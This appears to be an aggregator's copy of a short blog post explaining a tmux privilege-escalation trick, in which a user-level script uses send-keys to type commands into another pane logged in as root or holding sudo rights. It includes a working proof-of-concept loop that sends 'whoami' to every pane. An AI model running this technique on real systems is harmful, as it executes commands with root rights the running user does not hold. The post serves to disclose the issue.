44

tmux Privilege Escalation

 4 years ago
source link: https://www.tuicool.com/articles/7Jnm2ya
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

tmux privilege escalation abusing send-keys

A script run as user in tmux can under some circumstances execute commands as root.

tl;dr

Did you know you can send keystrokes to other panes in tmux?

You can abuse send-keys to send commands to a root/sudo pane.

That's all there is to it, that's the trick.

send-keys

There's a tmux feature to send keystrokes to a pane.

tmux send-keys -t $pane 'C-c' for example sends SIGINT to whatever is running in pane $pane.

man tmux

When I sae the send-keys feature, I was like:

"What if theres another pane, where the user is logged in as root?"

poc||gtfo

preparations

tmux  
tmux sp  
su # login as root

Now go back to the other tmux pane (where you are logged in as user).

action

Now run the following script, to execute whoami in every pane:

#!/bin/sh  
for pane in `tmux list-panes | grep -Po '^\d'`; do  
tmux send-keys -t $pane 'C-c'  
tmux send-keys -t $pane 'whoami  
';  
done;

You will see, as expected, the command whoami returned root.

sudo

With the same trick you can abuse that sudo was used in another pane.

tmux send-keys -t $pane 'sudo whoami  
';

. . /


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK